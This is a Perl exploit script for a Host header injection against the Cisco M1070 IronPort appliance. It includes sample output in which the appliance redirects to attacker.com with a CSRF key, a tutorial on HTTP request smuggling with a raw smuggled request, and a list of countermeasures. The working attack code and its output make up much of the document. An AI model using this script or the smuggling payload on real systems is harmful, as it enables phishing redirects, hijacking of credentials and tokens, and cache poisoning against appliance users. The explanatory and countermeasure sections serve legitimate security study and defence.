Cisco M1070 Content Security Management Appliance IronPort remote host header injection exploit.
5ba21eee4ea148a7f9115d1e1857e91697c72fa25d23cbcf551f8549a4fbe6d0
#!/usr/bin/perl -w
#
#
# Cisco M1070 Content Security Management Appliance IronPort Remote Header 'Host' Injection
#
#
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
# [test@localhost ironport]$ perl ironport_m1070.pl https://192.168.1.1 attacker.com
# # Cisco M1070 Content Security Management Appliance IronPort Remote Header 'Host' Injection
# # =========================================================================================
# # Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
# # > Host => attacker.com
# # > User-Agent => Mozilla/5.0 (X11; U; GNU/kFreeBSD i686; en-US; rv:1.8.1.16) Gecko/20080702 Iceape/1.1.11 (Debian-1.1.11-1)
# # > Content-Type => application/x-www-form-urlencoded
# # < Cache-Control => no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0
# # < Date => Mon, 02 Sep 2019 07:47:04 GMT
# # < Pragma => no-cache
# # < Location => https://attacker.com/login?CSRFKey=ed92aa93-5787-9216-8f3e-2a85c6e08d8b&referrer=https%3A%2F%2Fattacker.com%2FSearch
# # < Server => glass/1.0 Python/2.6.4
# # < Content-Type => text/html
# # < Expires => Mon, 02 Sep 2019 07:47:04 GMT
# # < Last-Modified => Mon, 02 Sep 2019 07:47:04 GMT
# # < Client-Date => Mon, 02 Sep 2019 07:47:05 GMT
# # < Client-Peer => 192.168.1.1:443
# # < Client-Response-Num => 1
# # < Client-SSL-Cert-Issuer =>
# # < Client-SSL-Cert-Subject =>
# # < Client-SSL-Cipher => DHE-RSA-AES128-GCM-SHA256
# # < Client-SSL-Socket-Class => IO::Socket::SSL
# # < Client-SSL-Warning => Peer certificate not verified
# # < Refresh => 0; URL=https://attacker.com/login?CSRFKey=ed92aa93-5787-9216-8f3e-2a85c6e08d8b&referrer=https%3A%2F%2Fattacker.com%2FSearch
# # < Set-Cookie => sid=a8iViXLfkLXVv02pu9pR; expires=Wednesday, 04-Sep-2019 07:47:04 GMT; httponly; Path=/; secure
# # < Title => : Redirecting
# # < X-Frame-Options => SAMEORIGIN
# # =========================================================================================
# # IronPort is Poisoned => https://attacker.com/login?CSRFKey=ed92aa93-5787-9216-8f3e-2a85c6e08d8b&referrer=https%3A%2F%2Fattacker.com%2FSearch
#
# Request Smuggling Attack - Input and Data Validation
#
# Implementation
#
# o Attack Applies To Vulnerable web servers and proxies.
#
#
# Description
#
# HTTP request smuggling is a technique to take advantage
# of discrepancies in parsing when one or more HTTP devices
# are between the user and the web server. An attacker may
# be able to 'smuggle' malicious requests through a packet
# inspector, firewall or web proxy server. This technique
# may leave the web server vulnerable to various attacks
# such as web cache poisoning, or allow the attacker to
# request protected files on the web server.
#
# Impact
#
# Cache poisoning: An attacker may be able to ‘rewire’
# o a web server cache so that one page is served when
# another is requested.
#
# Malicious requests: An attacker may be able to smuggle
# o a malicious request through a packet inspector, web proxy
# server, or firewall because of discrepancies in security
# rules between it and the web server.
#
# Credential hijacking: An attacker may be able to insert
# o a request into the HTTP flow, thereby manipulating the
# web server’s request/response sequencing, which can allow
# the attacker to hijack a third party’s credentials.
#
# Vulnerabilities
#
# o Web server, packet inspector, firewall, or web proxy server
# misconfiguration.
#
# Countermeasures
#
# Deploy a non-vulnerable web server: Web servers with a very
# o strict HTTP parsing procedure may not be vulnerable to this
# attack.
#
# Change all pages to non-cacheable: This will force the proxy
# to retrieve the pages from the web server every time. Although
# o this is better from a security perspective, the reality is that
# caching significantly improves the server's performance and
# reduces latency. Thus, other countermeasures are a better long
# term fix.
#
# o Rewrite all HTTP requests: Install a module on a firewall or
# proxy server to rewrite each HTTP request on the fly to a known
# valid request type.
#
# o Update your web server: Contact the web server vendor and check
# if there has been a patch released for a this type of vulnerability.
#
#
# Example
#
# This example describes the classic request smuggling attack
# in which an attacker can poison one page with the contents
# of another. In this example, the attacker combines one POST
# request and two GET requests into a single malformed HTTP
# request. The HTTP request has two Content-Length headers
# with conflicting values. Some servers, such as IIS and
# Apache simply reject such a request, but others attempt to
# ‘fix’ the error. Fortunately for the attacker, certain web
# servers and web proxies choose to pay attention to different
# sections of the malformed request.
#
# In this case let "somewhere.com" be the DNS name of the web
# server behind the proxy, and suppose that "/poison.html" is
# a static and cacheable HTML page on the web server.
#
# 1 POST http://somewhere.com/example.html
# HTTP/1.1\r\n2 Host: somewhere.com\r\n3
# Connection: Keep-Alive\r\n4
# Content-Type: application/x-www-form-urlencoded\r\n5
# Content-Length: 0\r\n6 Content-Length: 53\r\n7 \r\n8 GET /poison.html HTTP/1.1\r\n9
# Host: somewhere.com\r\n10 Bla: 11 GET http://somewhere.com/index.html HTTP/1.1\r\n12
# Host: somewhere.com\r\n13 Connection: Keep-Alive\r\n14 \r\n
#
# Note that line 10 is the only line that does not end in
# CRLF ("\r\n") and instead there is a space ("Bla: ").
# This request is sent to a web server via a proxy server.
#
# First, this message is parsed by the proxy. When the proxy server
# parses the message, it finds the POST request (lines 1-7) followed by
# the two conflicting Content-Length's (lines 5 and 6). The proxy ignores
# the first header and believes the body is 53 bytes long (which is exactly
# the number of bytes used by lines 8-10 including CRLFs). The proxy then
# sees lines 11-14 and interprets them as a second request.
#
# Second, the message is parsed by the web server. Although the web server
# receives the same message, when it sees the first Content-Length in line 5,
# it thinks that the body of the POST request is 0 bytes in length.
# Therefore it finds the second request in line 8 and interprets line 11
# as the value of "Bla: " in line 10 because of the missing CRLF.
#
#
# At this point the web server responds to the GET in line 8 by sending
# the content of /poison.html to the proxy. The proxy, expecting a
# response to the GET request in line 11, mistakenly matches the reply
# from the webserver with contents from /poison.html to the page /index.html.
# Therefore, the contents of /poison.html are cached under the name /index.html
# on the proxy. Now any user who requests http://somewhere.com/index.html
# through the proxy will receive the contents of http://somewhere.com/poison.html
# instead.
#
# There are several options available to mitigate this attack but all of
# them have their downside. If possible, use a well tested web server such
# as Apache or IIS. Otherwise, you can turn off server-side page caching,
# but this can lead to significant performance problems such as increased
# server load and latency. A final option is to use SSL communication for
# everything (HTTPS instead of HTTP), but this too has an associated
# performance overhead.
#
#
use strict;
use v5.10;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
my $host = shift || '';
my $attacker = shift || 'attacker.com';
print "# Cisco M1070 Content Security Management Appliance IronPort Remote Header 'Host' Injection
# =========================================================================================
# Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
";
if ($host !~ m/^http/){
print "# e.g. perl $0 https://target:port/ attacker.com
";
exit;
}
my $user_agent = rand_ua("browsers");
my $browser = LWP::UserAgent->new(
protocols_allowed => ['http', 'https'],
ssl_opts => { verify_hostname => 0 }
);
$browser->timeout(10);
$browser->agent($user_agent);
my $request = HTTP::Request->new (POST => $host,[Content_Type => "application/x-www-form-urlencoded"], " ");
$request->header("Host" => $attacker);
my $response = $browser->request($request);
print "# 401 Unauthorized!\n" and exit if ($response->code eq '401');
say "# > $_ => ", $request->header($_) for $request->header_field_names;
say "# < $_ => ", $response->header($_) for $response->header_field_names;
print "# =========================================================================================\n";
if (defined ($response->header('Location')) and ($response->header('Location') =~ m/$attacker/i)){
printf ("# IronPort is Poisoned => %s\n", $response->header('Location'));
exit;
} else {
printf ("# Exploit failed!\n");
exit;
}